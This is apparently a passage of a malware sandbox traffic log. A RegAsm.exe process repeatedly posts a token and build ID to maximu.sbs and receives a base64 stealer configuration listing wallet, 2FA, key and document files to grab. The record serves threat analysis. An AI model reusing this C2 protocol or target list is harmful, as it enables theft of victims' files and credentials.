                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:35 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----pp8q9rimy5ppzuk6pzcb
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:35 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 70 70 38 71 39 72 69 6d 79 35 70 70 7a 75 6b 36 70 7a 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 70 70 38 71 39 72 69 6d 79 35 70 70 7a 75 6b 36 70 7a 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 70 70 38 71 39 72 69 6d 79 35 70 70 7a 75 6b 36 70 7a 63 62 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------pp8q9rimy5ppzuk6pzcbContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------pp8q9rimy5ppzuk6pzcbContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------pp8q9rimy5ppzuk6pzcbCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:36 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:36 UTC356INData Raw: 31 35 38 0d 0a 52 47 56 7a 61 33 52 76 63 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 6b 59 58 51 73 4b 69 35 6b 62 32 4e 34 4c 43 6f 75 5a 47 39 6a 4c 43 6f 75 65 47 78 7a 4c 43 6f 75 65 47 78 7a 65 43 77 71 4c 6d 70 77 5a 79 77 71 4c 6d 70 77 5a 57 63 73 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 72 5a 58 6b 71 4c 69 70 38 4d 54 55 77 66 48 52 79 64 57 56 38 4b 6e 64 70 62 6d 52 76 64 33 4d 71 66 45 5a 73 59 58 4e 6f 49 45 52 79 61 58 5a 6c 66 43 56 45 55 6b 6c 57 52 56 39 53 52 55 31 50 56 6b 46 43 54 45 55 6c 58 48 77 71 4c 6e 52 34 64 43 77 71 4c 6d 52 68 64 43 77 71 4c 6d 52 76 59 33 67 73 4b 69 35 6b 62 32 4d 73 4b 69 35 34 62 48 4d 73 4b 69
                                                                                                                                                                                                                                                          Data Ascii: 158RGVza3RvcHwlRE9DVU1FTlRTJVx8Ki50eHQsKi5kYXQsKi5kb2N4LCouZG9jLCoueGxzLCoueGxzeCwqLmpwZywqLmpwZWcsKi5wbmcsKndhbGxldCouKiwqMmZhKi4qLCprZXkqLip8MTUwfHRydWV8KndpbmRvd3MqfEZsYXNoIERyaXZlfCVEUklWRV9SRU1PVkFCTEUlXHwqLnR4dCwqLmRhdCwqLmRvY3gsKi5kb2MsKi54bHMsKi


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          22192.168.2.449777116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:37 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----e3ekxb1dtjw47ymgl6fk
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:37 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 65 33 65 6b 78 62 31 64 74 6a 77 34 37 79 6d 67 6c 36 66 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 65 33 65 6b 78 62 31 64 74 6a 77 34 37 79 6d 67 6c 36 66 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 65 33 65 6b 78 62 31 64 74 6a 77 34 37 79 6d 67 6c 36 66 6b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------e3ekxb1dtjw47ymgl6fkContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------e3ekxb1dtjw47ymgl6fkContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------e3ekxb1dtjw47ymgl6fkCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:37 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:38 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          23192.168.2.449778116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:38 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----e3ekxb1dtjw47ymgl6fk
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:38 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 65 33 65 6b 78 62 31 64 74 6a 77 34 37 79 6d 67 6c 36 66 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 65 33 65 6b 78 62 31 64 74 6a 77 34 37 79 6d 67 6c 36 66 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 65 33 65 6b 78 62 31 64 74 6a 77 34 37 79 6d 67 6c 36 66 6b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------e3ekxb1dtjw47ymgl6fkContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------e3ekxb1dtjw47ymgl6fkContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------e3ekxb1dtjw47ymgl6fkCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:38 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:38 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          24192.168.2.449779116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:39 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----jeua1nyuas0zu3e3ectj
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:39 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 6a 65 75 61 31 6e 79 75 61 73 30 7a 75 33 65 33 65 63 74 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 6a 65 75 61 31 6e 79 75 61 73 30 7a 75 33 65 33 65 63 74 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 6a 65 75 61 31 6e 79 75 61 73 30 7a 75 33 65 33 65 63 74 6a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------jeua1nyuas0zu3e3ectjContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------jeua1nyuas0zu3e3ectjContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------jeua1nyuas0zu3e3ectjCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:40 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:39 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:40 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          25192.168.2.449780116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:40 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----w47qq9rqqimozu3e3ekx
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:40 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 77 34 37 71 71 39 72 71 71 69 6d 6f 7a 75 33 65 33 65 6b 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 77 34 37 71 71 39 72 71 71 69 6d 6f 7a 75 33 65 33 65 6b 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 77 34 37 71 71 39 72 71 71 69 6d 6f 7a 75 33 65 33 65 6b 78 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------w47qq9rqqimozu3e3ekxContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------w47qq9rqqimozu3e3ekxContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------w47qq9rqqimozu3e3ekxCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:41 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:41 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          26192.168.2.449781116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:41 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----cjeuk6xb16pzm79hv37g
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:41 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 63 6a 65 75 6b 36 78 62 31 36 70 7a 6d 37 39 68 76 33 37 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 63 6a 65 75 6b 36 78 62 31 36 70 7a 6d 37 39 68 76 33 37 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 63 6a 65 75 6b 36 78 62 31 36 70 7a 6d 37 39 68 76 33 37 67 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------cjeuk6xb16pzm79hv37gContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------cjeuk6xb16pzm79hv37gContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------cjeuk6xb16pzm79hv37gCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:42 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:42 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          27192.168.2.449782116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:42 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----cjeuk6xb16pzm79hv37g
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:42 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 63 6a 65 75 6b 36 78 62 31 36 70 7a 6d 37 39 68 76 33 37 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 63 6a 65 75 6b 36 78 62 31 36 70 7a 6d 37 39 68 76 33 37 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 63 6a 65 75 6b 36 78 62 31 36 70 7a 6d 37 39 68 76 33 37 67 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------cjeuk6xb16pzm79hv37gContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------cjeuk6xb16pzm79hv37gContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------cjeuk6xb16pzm79hv37gCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:43 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:43 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:43 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          28192.168.2.449783116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:43 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----g4op8gvkxt2v37q1nohd
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:43 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 67 34 6f 70 38 67 76 6b 78 74 32 76 33 37 71 31 6e 6f 68 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 67 34 6f 70 38 67 76 6b 78 74 32 76 33 37 71 31 6e 6f 68 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 67 34 6f 70 38 67 76 6b 78 74 32 76 33 37 71 31 6e 6f 68 64 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------g4op8gvkxt2v37q1nohdContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------g4op8gvkxt2v37q1nohdContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------g4op8gvkxt2v37q1nohdCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:43 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:44 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          29192.168.2.449784116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:44 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----g4op8gvkxt2v37q1nohd
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 1837
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:44 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 67 34 6f 70 38 67 76 6b 78 74 32 76 33 37 71 31 6e 6f 68 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 67 34 6f 70 38 67 76 6b 78 74 32 76 33 37 71 31 6e 6f 68 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 67 34 6f 70 38 67 76 6b 78 74 32 76 33 37 71 31 6e 6f 68 64 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------g4op8gvkxt2v37q1nohdContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------g4op8gvkxt2v37q1nohdContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------g4op8gvkxt2v37q1nohdCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:44 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:45 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          30192.168.2.449785116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:45 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----g4op8gvkxt2v37q1nohd
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 1837
                                                                                                                                                                                                                                                          Connection: Keep-Alive
